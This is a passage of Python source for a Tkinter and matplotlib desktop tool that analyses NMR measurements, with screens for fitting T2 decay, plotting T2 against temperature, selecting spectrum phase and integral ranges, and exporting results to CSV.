            self.entry_params_start[i].pack(side='left', anchor='e')
        #checkbox on the last row: fit the stretch r, or keep it fixed at 1
        self.check_params_start_var = tk.BooleanVar(self, 0)
        self.check_params_start = (ttk.Checkbutton(self.frame_params_start[-1],
                                                   variable=self.check_params_start_var))
        self.check_params_start.pack(side='left')
        self.button_fit = ttk.Button(self.frame_fit, text='Retry fit', command=Fit)
        self.button_fit.pack(side='top')
        self.label_fit_params = tk.Label(self.frame_fit, text='Fitted values', bd=5)
        self.label_fit_params.pack(side='top')
        #fit results entry rows (readonly)
        self.frame_params_fit = list()
        self.label_params_fit = list()
        self.entry_params_fit = list()
        for i,param in enumerate(param_list):
            self.frame_params_fit.append(tk.Frame(self.frame_fit))
            self.frame_params_fit[i].pack(side='top', fill='y')
            self.label_params_fit.append(tk.Label(self.frame_params_fit[i], text=param+' = '))
            self.label_params_fit[i].pack(side='left')
            self.entry_params_fit.append(tk.Entry(self.frame_params_fit[i], width=10,
                                                  state='readonly', justify='right'))
            self.entry_params_fit[i].pack(side='left')
        #run first lap of fit
        Fit()
        #add button to confirm selection
        self.button_confirm = ttk.Button(self.frame_fit, text='Confirm', command=self.Confirm)
        self.button_confirm.pack(side='bottom')
        self.button_confirm.bind('<Return>', self.Confirm)
        #export csv button
        self.button_export = ttk.Button(self.frame_fit, text='Export CSV', command=self.Export)
        self.button_export.pack(side='bottom')
        self.button_export.bind('<F5>', self.Export)
    def Confirm(self, event=None):
        '''Confirm the selection in this screen'''
        #release the waiting series loop before tearing the frame down
        self.parent.temperatures.wait.set(False)
        self.pack_forget()
        self.destroy()
        plt.close('all')
        #move to later stages
        self.trace.analysed = True
    def Refresh_parameters(self):
        '''refreshes the parameters table'''
        self.tree_parameters.delete(*self.tree_parameters.get_children())
        self.trace.Get_params()
        for item in GLOBAL_t2_displayed_params:
            try:
                pair = (item, self.trace.__dict__[item])
                self.tree_parameters.insert('', 'end', values=pair)
            except KeyError:
                #parameter not (yet) set on this trace: skip the row
                pass
    def Export(self, event=None):
        '''Saves the datapoints of the plot to a CSV file'''
        file_name = self.trace.file_key + '.csv'
        file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'T2_raw', )
        #make the csv folder for old experiments; already existing is fine
        try:
            os.mkdir(file_directory)
        except OSError:
            pass
        #write file
        with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
            writer = csv.writer(f, delimiter=';')
            #name row
            writer.writerow(['tau(s)', 'Signal(a.u.)'])
            #data
            for i in range(len(self.trace.tau_list)):
                row = [self.trace.tau_list[i], self.trace.area_list[i]]
                writer.writerow(row)
        tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
    def Fill_plot(self):
        '''Plots the T2 decay data; fit/start curves are filled in by Fit()'''
        #data lines
        x = np.array(self.trace.tau_list)*2
        y = np.array(self.trace.area_list)
        #T2 plot; start/fit lines are seeded with the data and updated later
        self.axes = self.fig_t2.add_subplot(111)
        self.axes.plot(x, y, 'bo', color=colors[1], label='Data')
        self.axes_start_plot, = self.axes.plot(x, y, color=colors[3],
                                               linestyle='dashed', label='Fit start')
        self.axes_fit_plot, = self.axes.plot(x, y, color=colors[4], label='Fit')
        #mark the end of the trusted mean range
        self.axes.axvline(x=x[self.trace.mean_range[1]], color=colors[2])
        self.axes.set_yscale('log')
        self.axes.set_title('T2')
        self.axes.set_xlabel(r'2*$\tau$ ($\mu$s)')
        self.axes.set_ylabel('Signal')
        self.axes.legend(loc='lower right')
        self.axes.grid()
class Frame_plot_T2_t2vt(tk.Frame):
    '''T2-vs-temperature trend plotting: 1/T2, center frequency and stretch.

    Traces are added with Add_trace(); each call draws one colored curve in
    every plot and caches the data for CSV export.
    '''
    def __init__(self, parent, trace):
        '''makes the subframe and fills it up'''
        tk.Frame.__init__(self, parent)
        self.pack(side='left', anchor='n')
        #reference to parent
        self.parent = parent
        #reference to current series
        self.trace = trace
        #counter for plots, cycles the trace colors
        self.counter = 0
        #load widgets
        self.Widgets()
    def Widgets(self):
        '''Builds all the subframes and canvases'''
        #button commands
        def Confirm(event=None):
            '''Confirm the selection in this screen'''
            #release the waiting series loop before tearing the frame down
            self.parent.temperatures.wait.set(False)
            self.pack_forget()
            self.destroy()
            plt.close('all')
            self.parent.traces.button_show.config(state='normal')
        #split in columns
        self.frame_plot_left = tk.Frame(self)
        self.frame_plot_left.pack(side='left', anchor='n')
        self.frame_plot_right = tk.Frame(self)
        self.frame_plot_right.pack(side='left', anchor='n')
        #plot frames
        self.frame_plot1 = tk.Frame(self.frame_plot_left, bd=5)
        self.frame_plot1.pack(side='top', anchor='n')
        self.frame_plot2 = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_plot2.pack(side='top', anchor='n')
        self.frame_plot3 = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_plot3.pack(side='top', anchor='n')
        #buttons frame
        self.frame_buttons = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_buttons.pack(side='top', anchor='e')
        #1/T2 vs T plot
        self.fig_t2vt = plt.figure(dpi=100, figsize=(7,4.5))
        self.fig_t2vt.subplots_adjust(bottom=0.12, left= 0.11, right=0.96, top=0.94)
        self.canvas_t2vt = FigureCanvasTkAgg(self.fig_t2vt, self.frame_plot1)
        self.canvas_t2vt._tkcanvas.pack()
        #center frequency plot
        self.fig_fr = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_fr.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
        self.canvas_fr = FigureCanvasTkAgg(self.fig_fr, self.frame_plot2)
        self.canvas_fr._tkcanvas.pack()
        #stretch plot
        self.fig_r = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_r.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
        self.canvas_r = FigureCanvasTkAgg(self.fig_r, self.frame_plot3)
        self.canvas_r._tkcanvas.pack()
        #add button to confirm selection
        self.button_confirm = ttk.Button(self.frame_buttons, text='Confirm', command=Confirm)
        self.button_confirm.pack(side='right', anchor='e')
        self.button_confirm.bind('<Return>', Confirm)
        self.Fill_plot()
        #add button to export to csv
        self.button_export = ttk.Button(self.frame_buttons, text='Export CSV', command=self.Export)
        self.button_export.pack(side='right', anchor='e')
    def Add_trace(self, trace):
        '''Adds traces to plots using given trace'''
        #initialize lists
        x = list()
        y = list()
        fr = list()
        r = list()
        #prepare all items for export
        popts = list()
        pcovs = list()
        for temp in self.trace:
            #only points that were analysed and not explicitly disabled
            if self.trace[temp].analysed and not self.trace[temp].disabled:
                x.append(temp)
                y.append(self.trace[temp].T2)
                #maybe calculate some center frequency at some point?
                fr.append(self.trace[temp].fr)
                #get stretch; traces fitted without a stretch parameter get r=1
                #(fixed: a second, unreachable duplicate "except AttributeError"
                # referencing an undefined name "yb" was removed here)
                try:
                    r.append(self.trace[temp].r)
                except AttributeError:
                    r.append(1)
                popts.append(self.trace[temp].fit_params)
                pcovs.append(self.trace[temp].fit_param_cov)
        #sort by temperature
        sorting = np.argsort(x)
        x = np.array(x)[sorting]
        y = np.array(y)[sorting]
        y2 = 1/y
        fr = np.array(fr)[sorting]
        r = np.array(r)[sorting]
        popts = np.array(popts)[sorting]
        pcovs = np.array(pcovs)[sorting]
        #draw trace
        self.axes_1.plot(x, y2, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        self.axes_2.plot(x, fr, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        self.axes_3.plot(x, r, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        #save for export
        self.data = dict()
        self.data['T'] = x
        self.data['T2'] = y
        self.data['fr'] = fr
        self.data['r'] = r
        self.data['popts'] = popts
        self.data['pcovs'] = pcovs
        #increase plot counter
        self.counter += 1
    def Export(self):
        '''Saves the plotted data into a CSV file for further analysis'''
        file_name = self.parent.current_trace + '.csv'
        file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'T2')
        #make the csv folder for old experiments; already existing is fine
        try:
            os.mkdir(file_directory)
        except OSError:
            pass
        #write file
        with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
            writer = csv.writer(f, delimiter=';')
            #name row
            writer.writerow(['T(K)', 'T2(s)', 'fr(MHz)', 'r', 'popts'])
            #data
            for i in range(len(self.data['T'])):
                row = [self.data['T'][i], self.data['T2'][i], self.data['fr'][i], self.data['r'][i]] + list(self.data['popts'][i])
                writer.writerow(row)
        tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
    def Fill_plot(self):
        '''Creates the (empty) axes for the T2vT plots'''
        self.axes_1 = self.fig_t2vt.add_subplot(111)
        self.axes_1.set_xscale('log')
        self.axes_1.set_yscale('log')
        self.axes_1.set_title('T2 temperature dependence')
        self.axes_1.set_xlabel('Temperature (K)')
        self.axes_1.set_ylabel(r'1/T2 (1/$\mu$s)')
        #self.axes_1.legend(loc='lower right')
        self.axes_1.grid()
        self.axes_2 = self.fig_fr.add_subplot(111)
        self.axes_2.set_title('Center frequencies')
        self.axes_2.set_xlabel('Temperature (K)')
        self.axes_2.set_ylabel('Frequency (MHz)')
        self.axes_2.margins(0.05, 0.1)
        self.axes_2.grid()
        self.axes_3 = self.fig_r.add_subplot(111)
        self.axes_3.set_title('Stretch')
        self.axes_3.set_xlabel('Temperature (K)')
        self.axes_3.set_ylabel('Stretch r')
        self.axes_3.margins(0.05, 0.1)
        self.axes_3.grid()
class Frame_plot_spc_quick(tk.Frame):
'''Quick settings for spectrum gluing'''
    def __init__(self, parent, trace):
        '''Makes the subframe and fills it up.

        Args:
            parent: owning frame; must expose `temperatures.previous_spc`
                (remembered shl/mirroring/offset settings).
            trace: the spectrum trace to analyse; must provide Quick_spc().
        '''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill='both', expand=True)
        #reference to parent
        self.parent = parent
        #reference to current trace:
        self.trace = trace
        #starting data: reuse the settings from the previous spectrum run
        self.shl = self.parent.temperatures.previous_spc['shl_start']
        self.mirroring = self.parent.temperatures.previous_spc['mirroring']
        self.offset_select = self.parent.temperatures.previous_spc['offset'][0]
        #load widgets
        self.Widgets()
        #run the quick spectrum analysis and plot its tables
        quick_tables = trace.Quick_spc()
        self.Fill_plots(*quick_tables)
        #take focus away from listbox
        self.focus()
        #global key binds
        root.bind('<Left>', self.Interrupt)
        root.bind('<Right>', self.Confirm)
def Confirm(self, event=None):
'''Saves shl, disables its selection and plots phases'''
#disable shl setters
self.entry_shl.config(state='disabled')
self.button_set_shl.config(state='disabled')
self.check_mirroring.config(state='disabled')
self.button_confirm_shl.config(state='disabled')
self.entry_offset.config(state='disabled')
self.button_set_offset.config(state='disabled')
#disconnect drag events
self.fig_left2.canvas.mpl_disconnect(self.axes_left2_vline_drag)
self.fig_right1.canvas.mpl_disconnect(self.axes_right1_hline_drag)
#enable confirm button
self.button_confirm.config(state='enabled')
self.entry_k.config(state='enabled')
self.entry_n.config(state='enabled')
self.button_fit.config(state='enabled')
#remember shl
self.mean_shl = self.shl
self.trace.mean_shl = self.shl
self.parent.temperatures.previous_spc['shl_start']=self.shl
#remember offset
self.trace.offset_range = (self.offset_select, None)
self.parent.temperatures.previous_spc['offset'] = (self.offset_select, None)
#remember mirroring
self.trace.mirroring = self.check_mirroring_var.get()
self.parent.temperatures.previous_spc['mirroring'] = self.check_mirroring_var.get()
self.trace.Get_phase(self.shl, (self.offset_select,None),
(self.fit_range_l_var.get(), self.fit_range_r_var.get())
)
#update entry values
self.entry_k_var.set('%.4g' %self.trace.phase_fit_p[0])
self.entry_n_var.set('%.4g' %self.trace.phase_fit_p[1])
#plot 4 phase
self.axes_right2 = self.fig_right2.add_subplot(111)
self.axes_right2.plot(self.trace.fr_list, np.unwrap(self.trace.phase_list, 0.5*np.pi), marker='.',
color=colors[1], label='SHL')
self.axes_right2_line2, = self.axes_right2.plot(self.trace.fr_list, self.trace.phase_fit,
color=colors[2], label='linear fit')
self.axes_vline_l = self.axes_right2.axvline(x=self.trace.fr_list[self.fit_range_l_var.get()], color=colors[4])
self.axes_vline_r = self.axes_right2.axvline(x=self.trace.fr_list[self.fit_range_r_var.get()-1], color=colors[4])
self.axes_right2.margins(0.02, 0.1)
self.axes_right2.set_title('Phase check')
self.axes_right2.set_xlabel('Frequency (MHz)')
self.axes_right2.set_ylabel('Shift left')
#self.axes_right2.legend(loc='lower right')
self.axes_right2.grid()
self.fig_right2.canvas.draw()
def Drag(event):
'''Allows dragging of the markers for fit range on spectrum plot'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.fit_range_l_var.set(np.searchsorted(self.trace.fr_list, event.xdata, side='right'))
#print(self.fit_range_l_var.get())
#self.range_l_select = int(event.xdata)
#update plot
self.axes_vline_l.set_xdata(event.xdata)
self.fig_right2.canvas.draw()
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.fit_range_r_var.set(np.searchsorted(self.trace.fr_list, event.xdata, side='left'))
#print(self.fit_range_r_var.get())
#self.range_r_select = int(event.xdata)
#update plot
self.axes_vline_r.set_xdata(event.xdata)
self.fig_right2.canvas.draw()
self.axes_vline_drag = self.fig_right2.canvas.mpl_connect('motion_notify_event', Drag)
root.bind('<Right>', self.Finish)
def Finish(self, event=None):
'''Accepts the data on this screen and closes it up'''
#hide this frame
self.pack_forget()
#close plots
plt.close('all')
#forget global key bind
root.unbind('<Right>')
root.unbind('<Left>')
#run next frame
self.parent.plot_spc_ranges = Frame_plot_spc_ranges(self.parent, self.trace)
def Interrupt(self, event=None):
'''Stops the analysis loop'''
#Destroy frame and plots
self.pack_forget()
self.destroy()
plt.close('all')
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
#stop the analysis loop
self.parent.temperatures.wait.set(False)
def Refit(self, event=None):
'''manual fit, change k, n values'''
## #manual version
## k = float(self.entry_k_var.get())
## n = float(self.entry_n_var.get())
## x = np.array(self.trace.fr_list)
## y = k*x+n
## self.axes_right2_line2.set_ydata(y)
##
## self.fig_right2.canvas.draw()
##
## self.trace.phase_fit_p = [k, n]
## self.trace.phase_fir = y
#refit using new fit range
self.trace.Get_phase(self.shl, (self.offset_select,None),
(self.fit_range_l_var.get(), self.fit_range_r_var.get())
)
self.axes_right2_line2.set_ydata(self.trace.phase_fit)
self.fig_right2.canvas.draw()
self.entry_k_var.set('%.4g' %self.trace.phase_fit_p[0])
self.entry_n_var.set('%.4g' %self.trace.phase_fit_p[1])
def Widgets(self):
'''Builds all the subframes and canvases'''
def Set_shl(event=None):
'''Entry chang eof shl, replot with new value'''
try:
self.shl = int(self.entry_shl.get())
#update plots
self.axes_left2_vline.set_xdata(self.shl)
self.axes_right1_hline.set_ydata(self.shl)
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted value must be integer!')
def Set_offset(event=None):
'''Entry change of offset select, replot with new value'''
try:
self.offset_select = int(self.entry_offset.get())
#update plots
self.axes_left2_vline_offset.set_xdata(self.offset_select)
self.fig_left2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted value must be integer!')
#split in two half frames
self.frame_left = tk.Frame(self)
self.frame_right = tk.Frame(self)
self.frame_left.pack(side='left', fill='y')
self.frame_right.pack(side='left', fill='y')
#add frames on left side
self.frame_left1 = tk.Frame(self.frame_left, bd=5)
self.frame_left2 = tk.Frame(self.frame_left, bd=5)
self.frame_left3 = tk.Frame(self.frame_left, bd=5)
self.frame_left1.pack(side='top')
self.frame_left2.pack(side='top')
self.frame_left3.pack(side='top', fill='x')
#add frames on right side
self.frame_right1 = tk.Frame(self.frame_right, bd=5)
self.frame_right2 = tk.Frame(self.frame_right, bd=5)
self.frame_right3 = tk.Frame(self.frame_right, bd=5)
self.frame_right4 = tk.Frame(self.frame_right, bd=5)
self.frame_right1.pack(side='top')
self.frame_right2.pack(side='top', fill='x')
self.frame_right3.pack(side='top')
self.frame_right4.pack(side='top', fill='x')
#add canvases and toolbars
#plot 1
self.fig_left1 = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_left1.subplots_adjust(bottom=0.20, left= 0.12, right=0.96, top=0.88)
self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
self.canvas_left1._tkcanvas.pack()
#plot 2
self.fig_left2 = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_left2.subplots_adjust(bottom=0.15, left= 0.12, right=0.96, top=0.9)
self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
self.canvas_left2._tkcanvas.pack()
#interrupt button
self.button_interrupt = ttk.Button(self.frame_left3, text='Interrupt', command=self.Interrupt)
self.button_interrupt.pack(side='left', anchor='w')
#confirm shl selection, jump to phase
self.button_confirm_shl = ttk.Button(self.frame_left3, text='Confirm', command=self.Confirm)
self.button_confirm_shl.pack(side='right', anchor='e')
#check button for mirroring fid
self.check_mirroring_var = tk.BooleanVar(self, False)
if self.mirroring:
self.check_mirroring_var.set(True)
self.check_mirroring = (ttk.Checkbutton(self.frame_left3, variable=self.check_mirroring_var))
self.check_mirroring.pack(side='right')
self.label_mirroring = tk.Label(self.frame_left3, text='Mirroring')
self.label_mirroring.pack(side='right')
#label and edit of mean_range
self.frame_left3_middle = tk.Frame(self.frame_left3)
self.frame_left3_middle.pack(anchor='center')
self.label_offset = tk.Label(self.frame_left3_middle, text='Chosen offset range:')
self.label_offset.pack(side='left')
self.entry_offset_var = tk.StringVar(self, value=self.offset_select)
self.entry_offset = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_offset_var, width=4)
self.entry_offset.pack(side='left')
self.entry_offset.bind('<Return>', Set_offset)
self.button_set_offset = ttk.Button(self.frame_left3_middle, text='Set offset', command=Set_offset)
self.button_set_offset.pack(side='left')
#plot 3
self.fig_right1 = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_right1.subplots_adjust(bottom=0.20, left= 0.12, right=0.96, top=0.88)
self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
self.canvas_right1._tkcanvas.pack()
#label and edit of shl select
self.frame_right2_middle = tk.Frame(self.frame_right2)
self.frame_right2_middle.pack(anchor='center')
self.label_shl = tk.Label(self.frame_right2_middle, text='Chosen shl:')
self.label_shl.pack(side='left')
self.entry_shl_var = tk.StringVar(self, value=self.shl)
self.entry_shl = ttk.Entry(self.frame_right2_middle,
textvariable=self.entry_shl_var, width=4)
self.entry_shl.pack(side='left')
self.entry_shl.bind('<Return>', Set_shl)
self.button_set_shl = ttk.Button(self.frame_right2_middle, text='Set SHL', command=Set_shl)
self.button_set_shl.pack(side='left')
#plot 4
self.fig_right2 = plt.figure(dpi=100, figsize=(7,4))
self.fig_right2.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right3)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
self.canvas_right2._tkcanvas.pack()
#entries for phase fit (lin)
self.label_k = tk.Label(self.frame_right4, text='k:')
self.label_k.pack(side='left')
self.entry_k_var = tk.StringVar(self, value=None)
self.entry_k = ttk.Entry(self.frame_right4, textvariable=self.entry_k_var, width=6, state='disabled')
self.entry_k.pack(side='left')
self.label_n = tk.Label(self.frame_right4, text='n:')
self.label_n.pack(side='left')
self.entry_n_var = tk.StringVar(self, value=None)
self.entry_n = ttk.Entry(self.frame_right4, textvariable=self.entry_n_var, width=6, state='disabled')
self.entry_n.pack(side='left')
self.button_fit = ttk.Button(self.frame_right4, text='Refit', command=self.Refit, state='disabled')
self.button_fit.pack(side='left')
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_right4, text='Confirm', command=self.Finish, state='disabled')
self.button_confirm.pack(side='right')
#fitting range variables for phase fit
self.fit_range_l_var = tk.IntVar(self, value=0)
self.fit_range_r_var = tk.IntVar(self, value=-1)
try:
self.fit_range_l_var.set(self.trace.fit_range[0])
self.fit_range_r_var.set(self.trace.fit_range[1])
except:
pass
def Fill_plots(self, temp_list, temp_list2, temp_set, fr_list, shl_list):
'''Puts the contents into the plot fields'''
#starting values
self.mean_shl = np.mean(shl_list)
#x axes
n = len(fr_list)
x_list = np.linspace(1,n,n)
#fids
fids = list()
for file in self.trace.file_list:
fid = FID(file, self.trace.file_dir)
fids.append(fid.x)
#plot 1, temperature stabillity
self.axes_left1 = self.fig_left1.add_subplot(111)
try:
if abs(np.mean(temp_list) - temp_set) < 2:
self.axes_left1.plot(x_list, temp_list, marker='.', color=colors[1], label='ITC_R1')
if abs(np.mean(temp_list2) - temp_set) < 2:
self.axes_left1.plot(x_list, temp_list2, marker='.', color=colors[2], label='ITC_R2')
except: pass
self.axes_left1.axhline(y=temp_set, color=colors[0], label='Set T')
self.axes_left1.margins(0.02, 0.1)
self.axes_left1.set_title('Temperature stabillity check')
self.axes_left1.set_xlabel('File index')
self.axes_left1.set_ylabel('Temperature (K)')
self.axes_left1.legend(loc='upper right')
self.axes_left1.grid()
#plot 2
self.axes_left2 = self.fig_left2.add_subplot(111)
for i, fid in enumerate(fids):
self.axes_left2.plot(np.abs(fid)+np.amax(np.abs(fids))*0.5*i,
color=colors[i%9], label=str(i))
self.axes_left2_vline = self.axes_left2.axvline(x=self.shl,
color=colors[0], label='Select')
self.axes_left2_vline_offset = self.axes_left2.axvline(x=self.offset_select,
color=colors[2], label='Offset Select')
self.axes_left2.set_title('offset range select')
self.axes_left2.set_xlabel('Time, (A.U.)')
self.axes_left2.set_ylabel('Signal')
#legend = self.axes_left2.legend(loc='lower right')
#legend.draggable()
self.axes_left2.grid()
#plot 3
self.axes_right1 = self.fig_right1.add_subplot(111)
self.axes_right1.plot(x_list, shl_list, marker='.',
color=colors[1], label='SHL')
self.axes_right1_hline = self.axes_right1.axhline(self.shl,
color=colors[0], label='Mean SHL')
self.axes_right1.margins(0.02, 0.1)
self.axes_right1.set_title('SHL select')
self.axes_right1.set_xlabel('File index')
self.axes_right1.set_ylabel('Shift left')
#self.axes_right1.legend(loc='lower right')
self.axes_right1.grid()
#redraw canvases
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, redraws the line on right'''
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.offset_select = int(event.xdata)
self.entry_offset_var.set(self.offset_select)
#update plot
self.axes_left2_vline_offset.set_xdata(event.xdata)
self.fig_left2.canvas.draw()
#draggable vline event
def Drag_shl(event):
'''Allows dragging of the marker in left2, redraws the line on right'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.shl = int(event.xdata)
self.entry_shl_var.set(self.shl)
#update plot
self.axes_left2_vline.set_xdata(self.shl)
self.axes_right1_hline.set_ydata(self.shl)
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
#draggable hline event
def Drag_shl2(event):
''''Allows dragging of the marker in right1, redraws shl lines'''
if event.button == 1 and event.inaxes !=None:
#find selected index
self.shl = int(event.ydata)
self.entry_shl_var.set(self.shl)
#update plots
self.axes_left2_vline.set_xdata(self.shl)
self.axes_right1_hline.set_ydata(event.ydata)
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag_shl)
self.axes_right1_hline_drag = self.fig_right1.canvas.mpl_connect('motion_notify_event', Drag_shl2)
class Frame_plot_spc_ranges(tk.Frame):
    '''Second spectrum screen: choose the integral ranges on the spectra.'''
    def __init__(self, parent, trace):
        '''Makes the subframe and fills it up.

        parent -- the owning frame (provides .temperatures with remembered settings)
        trace  -- the spectrum trace whose integral range is being selected
        '''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill='both', expand=True)
        #reference to parent
        self.parent = parent
        #reference to current trace:
        self.trace = trace
        #integral range (sample indices) remembered from the previous run
        self.range_l_select = self.parent.temperatures.previous_spc['integral_range'][0]
        self.range_r_select = self.parent.temperatures.previous_spc['integral_range'][1]
        #load widgets
        self.Widgets()
        #load plots and read
        self.Choose_ranges(trace)
        self.focus()
        #global key bindings: <Left> goes back, <Right> confirms
        root.bind('<Left>', self.Previous)
        root.bind('<Right>', self.Finish)
    def Widgets(self):
        '''Builds all the subframes and canvases'''
        #(a dead Set_offset helper that referenced widgets this class never
        # creates was removed here)
        def Set_range(event=None):
            '''Entry change of ranges, replot and save value'''
            try:
                self.range_l_select = int(self.entry_range_l_var.get())
                self.range_r_select = int(self.entry_range_r_var.get())
                #the spectra are plotted against the sample index, so the
                #marker lines live in index coordinates - same as in Drag
                #(BUGFIX: the old code indexed self.spc_fr, which was never
                # assigned, so 'Set range' raised AttributeError)
                self.axes_left1_vline_l.set_xdata(self.range_l_select)
                self.axes_left2_vline_l.set_xdata(self.range_l_select)
                self.axes_left1_vline_r.set_xdata(self.range_r_select)
                self.axes_left2_vline_r.set_xdata(self.range_r_select)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
            except ValueError:
                tk.messagebox.showerror('Error', 'The inserted values must be integers!')
        #split in two half frames
        self.frame_left = tk.Frame(self)
        self.frame_right = tk.Frame(self)
        self.frame_left.pack(side='left', fill='y')
        self.frame_right.pack(side='left', fill='y')
        #add frames on left side
        self.frame_left1 = tk.Frame(self.frame_left, bd=5)
        self.frame_left2 = tk.Frame(self.frame_left, bd=5)
        self.frame_left3 = tk.Frame(self.frame_left, bd=5)
        self.frame_left1.pack(side='top')
        self.frame_left2.pack(side='top')
        self.frame_left3.pack(side='top', fill='x')
        #add frames on right side
        self.frame_right1 = tk.Frame(self.frame_right, bd=5)
        self.frame_right2 = tk.Frame(self.frame_right, bd=5)
        self.frame_right3 = tk.Frame(self.frame_right, bd=5)
        self.frame_right1.pack(side='top')
        self.frame_right2.pack(side='top')
        self.frame_right3.pack(side='top', fill='x')
        #plot 1: mean spectrum with range markers
        self.fig_left1 = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_left1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
        self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
        self.canvas_left1._tkcanvas.pack()
        #plot 2: all spectra, stacked
        self.fig_left2 = plt.figure(dpi=100, figsize=(7,4.5))
        self.fig_left2.subplots_adjust(bottom=0.12, left= 0.10, right=0.96, top=0.93)
        self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
        self.canvas_left2._tkcanvas.pack()
        #buttons left
        self.button_previous = ttk.Button(self.frame_left3, text='Repeat previous', command=self.Previous)
        self.button_previous.pack(side='left')
        self.button_confirm = ttk.Button(self.frame_left3, text='Confirm', command=self.Finish)
        self.button_confirm.pack(side='right')
        #middle frame: manual entry of the two range indices
        self.frame_left3_middle = tk.Frame(self.frame_left3)
        self.frame_left3_middle.pack(anchor='center')
        self.label_range = tk.Label(self.frame_left3_middle, text='Selected ranges:')
        self.label_range.pack(side='left')
        self.entry_range_l_var = tk.StringVar(self, value=self.range_l_select)
        self.entry_range_l = ttk.Entry(self.frame_left3_middle,
                                       textvariable=self.entry_range_l_var, width=5)
        self.entry_range_l.pack(side='left')
        self.entry_range_l.bind('<Return>', Set_range)
        self.label_range_comma = tk.Label(self.frame_left3_middle, text=' , ')
        self.label_range_comma.pack(side='left')
        self.entry_range_r_var = tk.StringVar(self, value=self.range_r_select)
        self.entry_range_r = ttk.Entry(self.frame_left3_middle,
                                       textvariable=self.entry_range_r_var, width=5)
        self.entry_range_r.pack(side='left')
        self.entry_range_r.bind('<Return>', Set_range)
        self.button_set_range = ttk.Button(self.frame_left3_middle, text='Set range', command=Set_range)
        self.button_set_range.pack(side='left')
    #button commands
    def Previous(self, event=None):
        '''Back to the previous step!'''
        #repack the quick-settings frame
        #NOTE(review): the repacked quick frame's <Left>/<Right> key binds are
        #not re-established here - verify this is intended
        self.parent.plot_spc_quick.pack(side='left', fill='both', expand=True)
        #destroy me
        self.pack_forget()
        self.destroy()
        #unbind global keys
        root.unbind('<Right>')
        root.unbind('<Left>')
    def Finish(self, event=None):
        '''Confirm the selection in this screen'''
        #save the integral ranges
        self.trace.integral_range = (self.range_l_select, self.range_r_select)
        self.parent.temperatures.previous_spc['integral_range'] = (self.range_l_select,
                                                                  self.range_r_select)
        #finish the analysis
        self.trace.Run(broaden_width=50000)
        #unpack and destroy
        self.trace.analysed = True
        self.parent.plot_spc_quick.destroy()
        self.pack_forget()
        self.destroy()
        plt.close('all')
        #unbind global keys
        root.unbind('<Right>')
        root.unbind('<Left>')
        #load the overview frame
        self.parent.plot_spc_view = Frame_plot_spc_view(self.parent, self.trace)
    def Choose_ranges(self, trace):
        '''Operations and plotting for choosing spectrum integral ranges'''
        #phase-correct every FID and collect its spectrum
        spcs = list()
        for i, file in enumerate(trace.file_list):
            fid = FID(file, trace.file_dir)
            fid.Offset(trace.offset_range)
            fid.Shift_left(trace.mean_shl, mirroring=trace.mirroring)
            fid.Fourier()
            fid.Phase_rotate(trace.phase_fit[i])
            spcs.append(fid.spc)
        #index of the spectrum holding the overall maximum
        #NOTE(review): argmax on complex data orders by real part first - confirm intended
        max_spc = np.unravel_index(np.argmax(spcs), (len(spcs),len(spcs[0])))[0]
        spc_mean = spcs[max_spc]
        center = int(len(spc_mean)/2)
        #plot 3: the strongest spectrum with center and range markers
